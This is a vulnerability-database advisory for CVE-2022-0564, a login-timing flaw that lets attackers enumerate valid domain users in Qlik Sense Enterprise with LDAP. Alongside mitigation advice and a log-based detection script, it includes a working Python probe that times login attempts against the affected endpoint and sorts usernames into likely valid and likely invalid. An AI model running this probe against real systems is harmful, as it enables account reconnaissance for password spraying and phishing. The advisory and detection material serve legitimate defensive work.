CVE-2022-0564: CWE-204: Observable Response Discrepancy in Qlik Sense Qlik Sense Enterprise on Windows
A vulnerability in Qlik Sense Enterprise on Windows could allow a remote attacker to enumerate domain user accounts. An attacker could exploit this vulnerability by sending authentication requests to an affected system. A successful exploit could allow the attacker to compare the response times returned by the affected system to determine which accounts are valid user accounts. Affected systems are only vulnerable if they have LDAP configured. The affected URI is /internal_forms_authentication/; the response time of the form is longer if the supplied user does not exist and shorter if the user exists.
AI Analysis
Technical Summary
CVE-2022-0564 is a vulnerability in Qlik Sense Enterprise on Windows, specifically affecting version 14.x, that is exposed only when LDAP authentication is configured. The authentication handler behind /internal_forms_authentication/ takes measurably longer to answer when the supplied username does not exist than when it does. An unauthenticated remote attacker who submits login attempts for a list of candidate usernames and times each response can therefore tell valid domain accounts from invalid ones; this is the side channel classified as CWE-204 (Observable Response Discrepancy), information leakage through an observable difference in behaviour rather than in the response body. Because the signal is a latency difference rather than a distinct error message, a single request is rarely conclusive: an attacker samples each candidate several times and compares the results against a username known not to exist. The vulnerability requires neither user interaction nor prior authentication, which raises its risk profile, but its impact is limited to user enumeration. It does not by itself grant privilege escalation or code execution; its value is in feeding password spraying, brute force, and social-engineering attacks against confirmed accounts. No exploitation in the wild has been reported, and no official patch is linked from this record, so mitigation may have to rely on configuration changes until a vendor update is available.
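The measurement-and-comparison step described above, as an added example that is not part of the advisory or of Qlik's software. It times login attempts per candidate username, interleaves the samples so server-side drift hits every name equally, and classifies each candidate against a canary username that cannot exist, using the direction the advisory states (nonexistent user answers slower). The HTTP probe's form field names ("username", "pwd") are an assumption; the DEMO_TIMINGS values are constructed so the classifier can be exercised offline.

```python
"""Timing-based username enumeration check for CVE-2022-0564 (added example).

Not Qlik's code. The advisory says /internal_forms_authentication/ answers
SLOWER for a nonexistent user and FASTER for an existing one, so each
candidate's latency is compared with a canary username that cannot exist.
"""
import secrets
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List

Timings = Dict[str, List[float]]


def http_probe(base_url: str) -> Callable[[str], float]:
    """Build a probe that POSTs one login attempt and returns elapsed seconds.

    ASSUMPTION: the field names "username" and "pwd" are placeholders; capture
    a real login from the Qlik form to learn the actual names before use.
    """
    endpoint = base_url.rstrip("/") + "/internal_forms_authentication/"

    def probe(username: str) -> float:
        # A random password keeps every attempt on the "wrong password" path,
        # so only the user lookup differs between candidates.
        data = urllib.parse.urlencode(
            {"username": username, "pwd": secrets.token_urlsafe(12)}).encode()
        req = urllib.request.Request(endpoint, data=data, method="POST")
        start = time.perf_counter()
        try:
            urllib.request.urlopen(req, timeout=30).read()
        except urllib.error.HTTPError:
            pass  # a 401/403 still carries the timing signal
        return time.perf_counter() - start

    return probe


def collect(probe: Callable[[str], float], candidates: Iterable[str],
            canary: str, samples: int = 15) -> Timings:
    """Sample every name `samples` times, interleaved so server-side drift
    (cache warm-up, load spikes) affects candidates and canary alike."""
    timings: Timings = {canary: [], **{c: [] for c in candidates}}
    for _ in range(samples):
        for name in timings:
            timings[name].append(probe(name))
    return timings


def classify(timings: Timings, canary: str, min_gap_ratio: float = 0.2,
             mad_factor: float = 3.0) -> Dict[str, str]:
    """Label each candidate relative to the nonexistent canary.

    likely-valid   : median latency is clearly below the canary's
                     (by >20% of the canary median and >3 MADs of its jitter)
    likely-invalid : median latency sits within the canary's jitter band
    inconclusive   : anything else; collect more samples before concluding
    """
    base = timings[canary]
    base_med = statistics.median(base)
    base_mad = statistics.median(abs(x - base_med) for x in base) or 1e-6
    threshold = max(min_gap_ratio * base_med, mad_factor * base_mad)
    verdict: Dict[str, str] = {}
    for name, samples in timings.items():
        if name == canary:
            continue
        gap = base_med - statistics.median(samples)  # >0: faster than canary
        if gap > threshold:
            verdict[name] = "likely-valid"
        elif abs(gap) <= mad_factor * base_mad:
            verdict[name] = "likely-invalid"
        else:
            verdict[name] = "inconclusive"
    return verdict


# A random canary avoids accidentally picking a name that does exist.
CANARY = "zz-" + secrets.token_hex(5)

# Constructed timings (seconds) standing in for real measurements.
DEMO_TIMINGS: Timings = {
    CANARY:  [0.50, 0.52, 0.49, 0.51, 0.50, 0.53, 0.48],
    "alice": [0.31, 0.30, 0.33, 0.29, 0.32, 0.30, 0.31],   # exists: faster
    "bob":   [0.50, 0.51, 0.49, 0.52, 0.50, 0.50, 0.51],   # absent: like canary
    "carol": [0.45, 0.46, 0.44, 0.45, 0.47, 0.45, 0.46],   # too close to call
}

if __name__ == "__main__":
    for user, label in classify(DEMO_TIMINGS, CANARY).items():
        print(f"{user:<8} {label}")
    # Against a live instance you are authorized to test:
    # timings = collect(http_probe("https://qlik.example"), ["alice"], CANARY)
```

Run it only against an instance you are authorized to test. The "inconclusive" verdict is deliberate: a 50 ms gap on a 500 ms baseline is well inside normal network jitter, and the honest answer is to take more samples rather than to guess.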
Potential Impact
For European organizations using Qlik Sense Enterprise on Windows version 14.x with LDAP authentication enabled, this vulnerability poses a moderate risk. The ability to enumerate valid domain user accounts can facilitate reconnaissance activities by threat actors, enabling more efficient password guessing, phishing, or targeted attacks against identified users. This can lead to compromised credentials, unauthorized access, and potential lateral movement within corporate networks. Organizations in sectors with high-value data or critical infrastructure may face increased risk if attackers leverage this information to escalate attacks. While the vulnerability does not directly compromise system integrity or availability, the information disclosure can be a stepping stone for more severe intrusions. Given the widespread use of Qlik Sense in data analytics and business intelligence across Europe, especially in finance, manufacturing, and public sectors, the threat could have significant operational and reputational consequences if exploited.
Mitigation Recommendations
To mitigate this vulnerability, organizations should first verify whether LDAP authentication is enabled on their Qlik Sense Enterprise 14.x deployments; installations that do not use LDAP are not affected. If it is, consider temporarily disabling LDAP authentication or restricting access to the /internal_forms_authentication/ endpoint via network segmentation or firewall rules to trusted IP addresses only. Implement rate limiting and monitoring on authentication endpoints to detect and block abnormal request patterns indicative of enumeration: the telltale sign is one source submitting many distinct usernames in a short period, not a high failure count against a single account. Applying any vendor-provided patches or updates as they become available is critical, since only the vendor can remove the root cause by making the authentication path take the same time whether or not the user exists. If patches are not yet released, a Web Application Firewall (WAF) can help with rules that throttle or block a source exceeding a distinct-username rate on the endpoint; a WAF cannot see the timing difference itself, only the request volume that exploiting it requires. Logging response times alongside authentication failures and alerting on unusual patterns can help in early detection. Finally, educating users on phishing risks and enforcing multi-factor authentication (MFA) reduce the impact of credential harvesting that follows user enumeration.
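The monitoring rule recommended above, as an added example that is not part of the advisory or of Qlik's product: a per-source sliding window over distinct usernames submitted to /internal_forms_authentication/. The log format it parses (UTC timestamp, source IP, path, key=value fields) is a constructed, hypothetical one; Qlik's own proxy and audit logs are laid out differently, so parse_line() is the part to adapt. The sample lines are constructed.

```python
"""Flag username-enumeration bursts against /internal_forms_authentication/.

Added example, not Qlik's code. A source IP that submits at least THRESHOLD
distinct usernames to the endpoint inside a WINDOW-second sliding window is
reported with the largest distinct-user count it reached.
"""
from collections import defaultdict, deque
from datetime import datetime, timezone
from typing import Deque, Dict, Iterable, Tuple

ENDPOINT = "/internal_forms_authentication/"
WINDOW_SECONDS = 60
THRESHOLD = 10


def parse_line(line: str) -> Tuple[datetime, str, str, str]:
    """Split 'TS IP PATH key=value ...' (hypothetical format) into
    (timestamp, ip, path, user)."""
    ts_text, ip, path, *pairs = line.split()
    fields = dict(p.split("=", 1) for p in pairs)
    ts = datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ts, ip, path, fields.get("user", "")


def find_enumerators(lines: Iterable[str], window: int = WINDOW_SECONDS,
                     threshold: int = THRESHOLD) -> Dict[str, int]:
    """Return {source_ip: peak distinct usernames seen within one window}.

    Lines must be in time order per source IP (as a log normally is).
    Only requests to ENDPOINT count, and the outcome is ignored on purpose:
    the enumeration succeeds without a single successful login.
    """
    recent: Dict[str, Deque[Tuple[datetime, str]]] = defaultdict(deque)
    flagged: Dict[str, int] = {}
    for line in lines:
        if not line.strip():
            continue
        ts, ip, path, user = parse_line(line)
        if path != ENDPOINT:
            continue
        q = recent[ip]
        q.append((ts, user))
        while (ts - q[0][0]).total_seconds() > window:   # evict expired events
            q.popleft()
        distinct = len({u for _, u in q})
        if distinct >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), distinct)
    return flagged


# Constructed sample log (hypothetical format); 203.0.113.7 is the enumerator.
SAMPLE_LINES = (
    # burst: 12 different names in 22 seconds from one address
    [f"2025-03-01T10:00:{2 * i:02d}Z 203.0.113.7 {ENDPOINT} user=probe{i:02d} result=fail"
     for i in range(12)]
    # a real user mistyping a password twice, then succeeding
    + [f"2025-03-01T10:01:{s:02d}Z 198.51.100.5 {ENDPOINT} user=alice result={r}"
       for s, r in ((0, "fail"), (7, "fail"), (15, "ok"))]
    # many names, but against a different path: not this endpoint
    + [f"2025-03-01T10:02:{i:02d}Z 192.0.2.9 /hub/ user=x{i} result=ok" for i in range(12)]
    # slow scan: 12 names at 30 s spacing never reaches THRESHOLD in one window
    + [f"2025-03-01T10:{5 + i // 2:02d}:{30 * (i % 2):02d}Z 192.0.2.44 {ENDPOINT} "
       f"user=slow{i:02d} result=fail" for i in range(12)]
)

if __name__ == "__main__":
    print(find_enumerators(SAMPLE_LINES))   # {'203.0.113.7': 12}
```

The slow-scan source shows the trade-off in the window size: a patient attacker who spaces attempts 30 seconds apart stays under a 60-second window, so pair this rule with a longer window (hours) and a higher threshold, or with the response-time logging the section recommends.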
Affected Countries
Germany, United Kingdom, France, Netherlands, Sweden, Italy, Spain, Belgium, Poland, Ireland
Technical Details
- Data Version: 5.1
- Assigner Short Name: DIVD
- Date Reserved: 2022-02-10T00:00:00
- CISA Enriched: false
Threat ID: 682d983ec4522896dcbf0253
Added to database: 5/21/2025, 9:09:18 AM
Last enriched: 6/24/2025, 1:40:40 PM
Last updated: 8/14/2025, 11:52:54 PM
Views: 24
Related Threats
CVE-2025-8464: CWE-23 Relative Path Traversal in glenwpcoder Drag and Drop Multiple File Upload for Contact Form 7 (Medium)
CVE-2025-7499: CWE-862 Missing Authorization in wpdevteam BetterDocs – Advanced AI-Driven Documentation, FAQ & Knowledge Base Tool for Elementor & Gutenberg with Encyclopedia, AI Support, Instant Answers (Medium)
CVE-2025-8898: CWE-862 Missing Authorization in magepeopleteam E-cab Taxi Booking Manager for Woocommerce (Critical)
CVE-2025-8896: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in cozmoslabs User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor (Medium)
CVE-2025-8089: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in mdempfle Advanced iFrame (Medium)